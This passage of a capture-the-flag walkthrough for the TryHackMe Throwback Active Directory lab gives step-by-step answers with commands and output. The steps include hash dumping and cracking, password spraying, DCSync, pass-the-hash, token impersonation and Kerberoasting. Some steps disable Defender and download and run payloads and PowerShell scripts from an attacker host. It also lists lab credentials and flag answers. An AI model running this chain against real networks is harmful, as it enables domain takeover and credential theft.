    meterpreter > hashdump
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::
    Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
    
    kali@kali:~/Documents/THM/Throwback$ cat timekeeper_hash.txt 
    901682b1433fdf0b04ef42b13e343486
    kali@kali:~/Documents/THM/Throwback$ hashcat -m 1000 -a 0 timekeeper_hash.txt  /usr/share/wordlists/rockyou.txt 
    901682b1433fdf0b04ef42b13e343486:keeperoftime  
    

    Which user's hashes were we able to dump?

    Timekeeper

    What is the user's hash starting from the third colon?

    901682b1433fdf0b04ef42b13e343486

    What is the administrator's hash starting from the third colon?

    43d73c6a52e8626eabc5eb77148dca0b

    What is the user's cracked password?

    keeperoftime

    Task 28 - We gotta drop the load!

    kali@kali:~/Documents/THM/Throwback$ proxychains ssh Timekeeper@10.200.179.176
    Timekeeper@10.200.179.176's password: keeperoftime
    
    timekeeper@THROWBACK-TIME C:\xampp\mysql\bin>mysql.exe -u root -p
    Enter password: mysql337570 
    MariaDB [(none)]> show databases; 
    +--------------------+ 
    | Database           |
    +--------------------+
    | domain_users       |
    | information_schema |
    | mysql              |
    | performance_schema |
    | pets               |
    | phpmyadmin         |
    | test               |
    | timekeepusers      |
    +--------------------+
    MariaDB [(none)]> use domain_users; show tables; 
    Database changed        
    +------------------------+
    | Tables_in_domain_users |
    +------------------------+
    | users                  |
    +------------------------+
    1 row in set (0.000 sec)
    MariaDB [domain_users]> select * from users; 
    +----------------------+  
    | name                 |
    +----------------------+
    | ClemonsD             |
    | DunlopM              |
    | LoganF               | 
    | IbarraA              |               
    | YatesZ               |                                                       
    | CopelandS            |
    | MckeeE               |  
    | HeatonC              |  
    | FlowersK             |  
    | HardinA              |  
    | BurrowsA             |  
    | FinneganI            |
    | GalindoI             |               
    | LyonsC               |                                                       
    | FullerS              |                                                         
    | SteeleJ              |       
    | WangG                |                                                       
    | LoweryR              |                                                       
    | JeffersD             |                                                       
    | GreigH               |                                                       
    | SharpK               |                                                       
    | KruegerM             |                                                       
    | ChenI                |
    | VillanuevaD          |               
    | BegumK               |                                                       
    | TBH{ac3f61048236fd39 |                                                             
    | 8da9e2289622157e}    |        
    +----------------------+
    

    What database are the timekeep login users located?

    timekeepusers

    What database are the domain users located in?

    domain_users

    What table was located in the domain users database?

    users

    What is the first username in the table?

    ClemonsD

    What is the root flag on THROWBACK-TIME?

    Using the meterpreter's session we used for dumping the hashes.

    meterpreter > cat C:\\Users\\Administrator\\Desktop\\root.txt
    TBH{2898c692926188884bf508efe560588f}

    What is the SQL flag on THROWBACK-TIME?

    TBH{ac3f61048236fd398da9e2289622157e}

    Task 29 - So we're doing this again...

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null crackmapexec smb 10.200.179.117 --continue-on-success -u users_db.txt -p weakPasswords.txt | grep \+
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK.local\JeffersD:Throwback2020 

    What user was successfully password sprayed?

    JeffersD

    What was the password for the user?

    Throwback2020

    Task 30 - SYNCHRONIZE

    Bloodhound DCSync
    kali@kali:~/Documents/THM/Throwback$ proxychains ssh JeffersD@10.200.179.117
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:22  ...  OK
    JeffersD@10.200.179.117's password:   Throwback2020
    throwback\jeffersd@THROWBACK-DC01 C:\Users\jeffersd>type Documents\backup_notice.txt
    As we backup the servers all staff are to use the backup account for replicating the servers
    Don't use your domain admin accounts on the backup servers.
    
    The credentials for the backup are:
    TBH_Backup2348!
    
    Best Regards,
    Hans Mercer
    Throwback Hacks Security System Administrator
    
    
    kali@kali:~/Documents/THM/Throwback$ proxychains secretsdump.py -dc-ip 10.200.179.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.179.117
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:135  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:49667  ...  OK
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e46b15fc5fb941c6ff32a752a6668d1:::
    [...]
    THROWBACK.local\MercerH:1206:aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea:::
    [...]

    What user has dcsync rights?

    backup

    What user can we dump credentials for and is an administrator?

    Mercerh

    Submit flags for THROWBACK-DC01 in Task 4.

    kali@kali:~/Documents/THM/Throwback$ proxychains psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/Mercer
    H"@10.200.179.117                                                               
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14  
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
                                                                                   
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [*] Requesting shares on 10.200.179.117..... 
    [*] Found writable share ADMIN$                                                
    [*] Uploading file aqRjwPOM.exe                                                
    [*] Opening SVCManager on 10.200.179.117.....
    [*] Creating service Mrdy on 10.200.179.117.....  
    [*] Starting service Mrdy.....
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [!] Press help for extra shell commands 
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    Microsoft Windows [Version 10.0.17763.1282]
    (c) 2018 Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>cd C:\users

    What is the user flag on THROWBACK-DC01?

    C:\Users>type C:\Users\gongoh\Desktop\user.txt
    TBH{e6119f456f5107d655be3682559f720f}

    What is the root flag on THROWBACK-DC01?

    C:\Users>type C:\Users\MercerH\Desktop\root.txt    
    TBH{1b9b614a505017c6fa34cb188581db65}

    What is the account description flag on THROWBACK-DC01?

    C:\Users>powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/PowerView.ps1'); Get-NetUser | select samaccountname, description" 
    [...]
    samaccountname description                                              
    -------------- -----------
    MercerH        TBH{b89d9a1648b62a7f2ed01038ac47796b}

    Task 31 - This forest has trust issues

    hashcat -m 1000 -a 0 -r rules/OneRuleToRuleThemAll.rule hashes/mercerh_hash.txt /usr/share/wordlists/rockyou.txt
    5edc955e8167199d1b7d0e656da0ceea:pikapikachu7
    
    kali@kali:~/Documents/THM/Throwback$ proxychains scp /tmp/NotAShell.exe Mercerh@10.200.179.117:"C:/Windows/Temp/"
    kali@kali:~/Documents/THM/Throwback$ proxychains ssh Mercerh@10.200.179.117 "C:/Windows/Temp/NotAShell.exe"
    
    use multi/manage/autoroute
    set session 15
    set subnet 10.200.179.0
    exploit
    use auxiliary/server/socks_proxy
    exploit
    

    What domain has a trust relationship with THROWBACK.local?

    corporate.local

    What is the hostname of the machine that has a forest trust with the domain controller?

    CORP-DC01

    What is the Administrator account we can use to access the second forest?

    mercerh

    What is the name of the file in the Administrator's Documents folder?

    server_update.txt

    Submit flags for CORP-DC01 in Task 4

    Run a cmd as root

    What is the user flag on CORP-DC01?

    C:\Windows\System32>type C:\Users\Mercerh\Desktop\user.txt
    TBH{773e16d57284363e68a4db254860aed1}

    What is the root flag on CORP-DC01?

    C:\Windows\System32>type C:\Users\Administrator\Desktop\user.txt
    TBH{d2368a76214103ac670a7984b4dba5a3}

    Task 32 - r/badcode would like a word

    Git Hub repository: Link

    What User has a Github Account?

    Rikka Foxx

    What was the user found in github?

    DaviesJ

    What password was found in github?

    Management2018

    What machine can you access with the credentials?

    kali@kali:~/Documents/THM/Throwback$ sudo proxychains xfreerdp /u:MercerH /p:'pikapikachu7' /v:10.200.179.118  
    
    # Run a cmd as administrator
    C:\Users\MercerH\Documents> powershell.exe -exec bypass -c "Set-MpPreference -DisableRealtimeMonitoring 1"
    C:\Users\MercerH\Documents>certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
    C:\Users\MercerH\Documents> .\NotAShell.exe
    
    use multi/manage/autoroute
    set session 21
    set subnet 10.200.179.0
    exploit
    use auxiliary/server/socks_proxy
    exploit
    
    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null evil-winrm  -u DaviesJ -p Management2018 -i 10.200.179.243
    *Evil-WinRM* PS C:\Users\daviesj\Documents> 

    CORP-ADT01

    What is the flag on GitHub?

    https://github.com/RikkaFoxx

    TBH{19fa56ead6f82d8c4abc664e2e56f0b1}

    What is the flag on Twitter?

    https://twitter.com/tbhSecurity/status/1292594165855981568

    TBH{ca57861454b195f6a5c951a634e05f9e}

    Task 33 - Identity Theft is not a Joke Jim

    *Evil-WinRM* PS C:\Users\daviesj\Documents> certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
    ****  Online  ****
    CertUtil: -URLCache command completed successfully.
    *Evil-WinRM* PS C:\Users\daviesj\Documents> .\NotAShell.exe
    
    meterpreter > use incognito
    Loading extension incognito...Success.
    meterpreter > list_tokens -u
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    CORPORATE\DaviesJ
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    Font Driver Host\UMFD-2
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-1
    Window Manager\DWM-2
    
    Impersonation Tokens Available
    ========================================
    CORPORATE\DosierK
    
    meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    [+] Delegation token available
    [+] Successfully impersonated user NT AUTHORITY\SYSTEM
    
    meterpreter > cat C:\\USers\\dosierk\\Documents\\email_update.txt
    Hey team! Hope you guys are having a good day!
    
    As all of you probably already now we are transferring to our new email service as we
    transition please use the new emails provided to you as well as the default credentials
    that can be found within your emails.
    
    Please do not use these emails outside of corporate as they contain sensitive information.
    
    The new email format is based on what department you are in:
    
    ESM-Example@TBHSecurity.com
    FIN-Example@TBHSecurity.com
    HRE-Example@TBHSecurity.com
    ITS-Example@TBHSecurity.com
    SEC-Example@TBHSecurity.com
    
    In order to access your email you will need to go to mail.corporate.local as we get our 
    servers moved over.
    
    If you do not already have mail.corporate.local set in your hosts file please reach out to
    IT to get that fixed.
    
    Please remain patient as we make this transition and please feel free to email me with any
    questions you may have regarding the new transition: HRE-KDoiser@TBHSecurity.com
    
    Karen Dosier,
    Human Relations Consulatant
    

    What file is on the Administrator's Documents folder?

    email_update.txt

    Who wrote the email?

    Karen Dosier

    What is her official title in the company?

    Human Relations Consulatant

    Submit flags for CORP-ADT01 in Task 4

    What is the user flag on CORP-ADT01?

    meterpreter > cat C:\\USers\\DaviesJ\\Desktop\\user.txt
    TBH{250fd11eadbd01e7ed14196611d7b255}

    What is the root flag on CORP-ADT01?

    meterpreter > cat C:\\USers\\dosierk\\Desktop\\root.txt
    TBH{7defa0d5b36c72a48e5966fd2493e19e}

    What is the flag on LinkedIn?

    Link -> TBH{2913c22315f3ce3c873a14e4862dd717}

    Task 35 - Lost and Found

    You need to use foxy proxy with proxychains in order to get access to the web.

    echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts
    
    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null ffuf -w new_emails.txt -u http://www.breachgtfo.local/search.php?search=FUZZ -fw 1265
    test@email.com          [Status: 200, Size: 5046, Words: 1284, Lines: 224]
    SEC-jstewart@TBHSecurity.com [Status: 200, Size: 5071, Words: 1284, Lines: 224]
    
    Email: SEC-JStewart@TBHSecurity.com
    Password: aqAwM53cW8AgRbfr
    Username: JStewart
    Data Breach: pwnDB
    

    What is the Users email who has been affected by the Databreach?

    SEC-JStewart@TBHSecurity.com

    What was the Users password?

    aqAwM53cW8AgRbfr

    What credentials could be found in the Email?

    TBSEC_GUEST:WelcomeTBSEC1!

    Submit flags for reconnaissance in Task 4

    What is the flag in the source code of Breach || GTFO?

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null curl "http://www.breachgtfo.local/search.php?search=SEC-jstewart@TBHSecurity.com" | grep TBH
    <!--TBH{53f3a6cb77f633edd9749926b9a9217b}-->

    TBH{53f3a6cb77f633edd9749926b9a9217b}

    What is the flag on the Corporate Mail server?

    Using the email address and the password at http://mail.corporate.local/mailbox.php we can get the flag.

    TBH{19b6ca4281bbef3ee060aaf1c2eb4021}

    Task 36 - Kerberoasting II Electric Boogaloo

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBSEC_GUEST /p:'WelcomeTBSEC1!' /v:10.200.179.79
    
    
    C:\Users\TBSEC_GUEST>powershell -exec bypass "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat Hashcat"
    
    
    TicketByteHexStream  :
    Hash                 : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48064*$A54264EEFA8C95B5506BF936032C9D59$E7CB41FA7A4638D373EBEE1539C6B434A6BA1A0199A1F56A93E34F53BA8E50BDB43FB56C3967DDDAE5E0B759D2D22158C1D96F5D7610C0D7FECC7E0E92434449459D77FF7792B532093B7F65E4FA14EB43161EF9B140BA83A0A7951A666E6DCAB2408398F454C627016C5470B1198EAF1BB364F267BDE748FFB8389689CE9C3143A1DC274AD2CB1A624A09781BFB8039802FFB37CC4FD36C90D63476D244004C9DF074C6532777EB96037FA26603AA93201B73C9623418BA4DCE3B40384ECFE3EFB976E972E4DCDD4E4979637D56EE91A8844378A6A815B446598975A65DE5C7B1032ECE479A93BFFD595DFEDBA457F06CFCAF5BEB1CA6E9E44F733EB49A3A43CEF1A476B6744400985449259153CE867A345CD2912F3CCB6B163E1D4AEBAA58416404F34D29B0CAA6AF3274E65DAFEF6F01CCAE8D26E91AE34490A6823767D96B2345C83842ACC8049D94F2D9072B98A1ECF0A7CB92636581EEF1D2A22697B61ABAC7418E9902FDD7527C6206BB0B6EF8734CEBC7CE13E649CDD457A8166DB0BC59CE1C09C5F257FA2144E6E0C12898D0DF34DD9B63D4770E9753AB78985C249B3FFDE4DA6F0E8FF83B5813E212D191AD3139573533EF5BA7675CA20EBF396AC83B7DA801A59823C1400FA01F8BC9427F2EA42CE8B700833D673F67B08A51C119155621CC646A4B7F37233FB2D8E33791FF1FB0A7C2EAA8C2C464524DEA1CB648D5168E1E8023AF09A51B78228EA2285FFB9316D3986BC776CCB7798EE00BF5EAA8B04253775FBFCBD4ABA4F4D7FAD66459D735A4D9213DBEC620B0E574864F25CC37B44D9EF3A607ADC37E1ECDABCCEB72D61D1F5A8C98975479AF67D302D2CC860F1C8ABC7A76C371EC806906E06B355754AACADCBFBEBEB856A71BABBC2D18540E1D35400FA21D3BE9CDA234CF03CD6FC2F79415C15ABBA7F42FF76FCC3DBE05F93DF511001496A50EFCFC050E4676760C73CE84A9E4536C38FC38D0FCF0B076BE874B8E0146445899AFD4EBC96CCDCC6645273F62FF5857E97A83FE16D0B3E4C8165D10D3854541A60F4C29315D173B7F4473F06CA153478B50EC0AF91094D57612D5DEDEE23F325B661D392F8D9B92329AF410B3FE928C63B9A0305B7924BDF0CEFD6EB6CA090232A05C82C83EE39BDEAB7BA0AF813FC0A12CA7C05DF124A8F7405327EAC1CC148F92887F5C3F61787CE29EDF4C1EEC87FA0F8EA7FDC0CCEE6BD4DFACE4B46227D867B3510FA7EB36CECBB689EBDE68B2128D0724F7B38404A2F9CACE0F2CD906881AE2D28904AB02DDD457854E8DE1EBBDD6351A02D8F141460CF53D2D82B8BDB31E20E9066432B10D75B44C7769C7F1D22E93B1C01A4FC825835493230A5F6460C05C797B95629E7AD6EED41A1F0B2BA55ACA62071464E1D733A41FCC96B8C713EE306C75151E04252C673E4974D19A2A267295F41A2AF8A9FF9ECADF4DD59D38181E946A12C6E299F133600903BA85F4F6E1822F7CB62B283C615EE78689609423500C1E1FD04A02714A7B87CF8E36209D1804AC815F0C151F8293
    SamAccountName       : TBService
    DistinguishedName    : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local
    ServicePrincipalName : TBSEC-DC01/TBService.TBSECURITY.local:48064
    
    kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 tbservice_ticket.txt /usr/share/wordlists/rockyou.txt 
    [...]:securityadmin284650

    What User was vulnerable to Kerberoasting?

    TBService

    What password could be cracked from the Kerberos Ticket?

    securityadmin284650

    Submit flags for TBSEC-DC01 in Task 4

    What is the user flag on TBSEC-DC01?

    C:\Users>type C:\Users\daviesj\Desktop\user.txt
    TBH{3efabe3366172f3f97d1123f2cc6dfb5}

    What is the root flag on TBSEC-DC01?

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBService /p:'securityadmin284650!' /v:10.200.179.79
    C:\Users>type C:\Users\Administrator\Desktop\root.txt
    TBH{ec08be8aa9113b47f321b5032a27b220}